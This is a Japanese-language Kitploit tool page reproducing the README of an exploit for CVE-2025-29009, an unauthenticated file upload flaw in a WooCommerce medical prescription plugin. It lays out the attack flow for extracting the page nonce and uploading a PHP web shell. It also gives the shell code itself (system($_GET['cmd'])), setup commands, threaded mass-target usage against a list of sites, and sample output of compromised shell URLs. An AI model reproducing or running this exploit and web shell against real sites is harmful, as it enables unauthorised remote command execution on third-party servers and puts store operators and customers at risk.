Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29009 — WordPress Medical Prescription Attachment Plugin for WooCommerce Plugin <= 1.2.3 は、優先度の高い任意ファイルアップロード(Arbitrary File Upload)の脆弱性の影響を受けます。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-29009
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-29009

CVE-2025-29009

WordPress Medical Prescription Attachment Plugin for WooCommerce Plugin <= 1.2.3 は、優先度の高い任意ファイルアップロード(Arbitrary File Upload)の脆弱性の影響を受けます。

リポジトリを見る
1114ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-29009

WooCommerce用WordPressプラグイン「Medical Prescription Attachment Plugin」<= 1.2.3 は、高優先度の任意ファイルアップロードの脆弱性の影響を受けます

CVE-2025-29009

Webkul Medical Prescription Attachment — 無制限ファイルアップロード → Webシェル

root@kitploit:~
,-. .   , ,--.     ,-.   ,-.  ,-.  ;--'     ,-.   ,-.   ,-.   ,-.   ,-.
/    |  /  |           ) /  /\    ) |           ) (   ) /  /\ /  /\ (   )
|    | /   |-   ---   /  | / |   /  `-.  ---   /   `-'| | / | | / |  `-'|
\    |/    |         /   \/  /  /      )      /       / \/  / \/  /     /
 `-' '     `--'     '--'  `-'  '--' `-'      '--'  `-'   `-'   `-'   `-'

CVE Plugin Auth Python Author


❶ 脆弱性

根本原因:
wkwcpa_handle_prescription_session AJAXハンドラー(action=wkwcpa_handle_prescription_session)は、wkwc_pa_prescription_attachment[] を介したファイルアップロードを、サーバーサイドでファイル拡張子やMIMEタイプを検証せずに受け入れます。未認証の攻撃者は、公開されているWooCommerceストアフロント(wkwcpaFrontObj JavaScriptオブジェクトに埋め込まれている)から ajaxNonce を抽出し、PHP Webシェルをサーバーのアップロードディレクトリに直接アップロードできます。レスポンスには、アップロードされたファイルの完全なアクセス可能なURLが返されます。


❷ 攻撃フロー

root@kitploit:~
┌──────────────────────────────────────────────────────────────┐
│  1. Resolve front page                                       │
│     GET /  →  GET /shop/  →  GET /product/  →  GET /?wkwcpa=1│
│                                                              │
│  2. Extract nonce                                            │
│     Parse wkwcpaFrontObj.ajax.ajaxUrl                        │
│     Parse wkwcpaFrontObj.ajax.ajaxNonce                      │
│                                                              │
│  3. Upload shell                                             │
│     POST <ajaxUrl>                                           │
│       action = wkwcpa_handle_prescription_session            │
│       nonce  = <ajaxNonce>                                   │
│       type   = upload                                        │
│       wkwc_pa_prescription_attachment[] = shell.php          │
│                                                              │
│  4. Parse response                                           │
│     JSON → data.attachments_img_html[].src  →  shell URL    │
│                                                              │
│  5. Verify shell                                             │
│     GET <shell_url>  →  check for unique signature           │
│                                                              │
│  6. Save to shells.txt                                       │
└──────────────────────────────────────────────────────────────┘

❸ セットアップ

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-29009.git
cd CVE-2025-29009
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

❹ シェルの準備

ツールが実行の成功を検証できるよう、一意の署名文字列を埋め込んだPHPシェルを作成してください:

root@kitploit:~
<?php
// NxploitedShellOK
system($_GET['cmd']);
?>

スクリプトと同じディレクトリに shell.php として保存してください。
NxploitedShellOK という文字列が署名です — 検証を通過するには、シェルのレスポンスにこの文字列が含まれている必要があります。


❺ 使用方法

root@kitploit:~
python3 CVE-2025-29009.py

プロンプト

root@kitploit:~
Targets file (default list.txt):              list.txt
Threads (default 10):                         10
Local shell filename (e.g. shell.php):        shell.php
Unique shell signature (e.g. NxploitedShellOK): NxploitedShellOK

ターゲット形式 — list.txt

root@kitploit:~
https://target1.com
target2.com
http://target3.com

http:// または https:// が付いていないターゲットには、自動的に http:// がプレフィックスとして付加されます。


❻ 出力

ファイル内容
shells.txt検証済みのシェルURLを1行に1つ

ターミナル:

root@kitploit:~
[SHELL]  https://target.com/wp-content/uploads/2025/06/shell.php
[FAIL]   https://target2.com  (nonce_not_found)
[FAIL]   https://target3.com  (success_false)
[Status] 3/3  OK:1  FAIL:2

❼ 失敗コード


❽ 作者

root@kitploit:~
Nxploited
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


❾ 免責事項

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.

© 2025 Nxploited · Medical Prescription Attachment ≤ 1.2.3 · 1.2.4で修正済み

ツールをダウンロード
項目詳細
CVECVE-2025-29009
プラグインWebkul Medical Prescription Attachment Plugin for WooCommerce
影響を受けるバージョンすべてのバージョン ≤ 1.2.3
認証不要
種別危険なタイプのファイルの無制限アップロード → Webシェルアップロード
CWECWE-434 · 危険なタイプのファイルの無制限アップロード
コード意味
shell_file_missing作業ディレクトリに shell.php が見つかりません
no_front_pageHTTP 200を返す候補ページがありません
nonce_not_foundどのページにも wkwcpaFrontObj が存在しません
upload_errorPOST中のネットワークエラー
json_parse_errorレスポンスが有効なJSONではありません
success_falseサーバーが data.success = false を返しました
no_attachmentsアップロードは成功しましたが、レスポンスにURLがありません
shell_url_not_foundレスポンスのHTMLからファイルURLを解析できませんでした